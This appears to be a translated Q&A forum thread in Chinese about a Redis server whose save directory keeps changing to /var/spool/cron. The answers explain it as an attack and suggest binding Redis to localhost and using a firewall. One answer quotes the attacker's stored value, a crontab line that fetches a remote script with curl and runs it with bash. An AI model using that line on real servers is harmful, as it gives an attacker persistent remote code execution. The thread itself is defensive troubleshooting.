我已经设置了我的redis-server,以便CONFIG GET dir --> "/var/lib/redis"和CONFIG GET dbfilename --> "redis.rdb"。
但是,在我的服务器运行几个小时或几天后,我开始收到"Failed opening .rdb for saving: Permission denied"错误。
如果我再次CONFIG GET dir --> "/var/spool/cron"和CONFIG GET dbfilename --> "root"。我试着到处寻找某种理解正在发生的事情,但没有用。
如果我只是重新启动我的redis-server,那么配置将再次重置为我在“redis.conf”文件中设置的原始设置。
答案 0 :(得分:3)
这确实是一种攻击。如果在发生这种情况后检查你的redis键,你会看到很少的“字符串”键:“Backup1”,“Backup2”,“Backup3”。
这些的价值将是这样的:
"\t\n*/2 * * * * curl -s https://transfer.sh/QMvW6/tmp.M8pAEgBA6T > .cmd && bash .cmd\n\t"
这是为了修改你的crontab。
底线是 - 没有向全世界开放的redis端口。
答案 1 :(得分:0)
这似乎只是一个安全问题。开箱即用的redis可通过任何IP地址访问。作为检查这是@ItamarHaber建议的安全问题的简单第一步,我只是将redis服务器绑定到localhost,现在问题似乎已经解决了。这篇文章很有帮助我解决了这个问题。A few things about Redis security
答案 2 :(得分:0)
这可以通过重新启动VM,启用UFW防火墙,允许经过授权的IP地址来解决。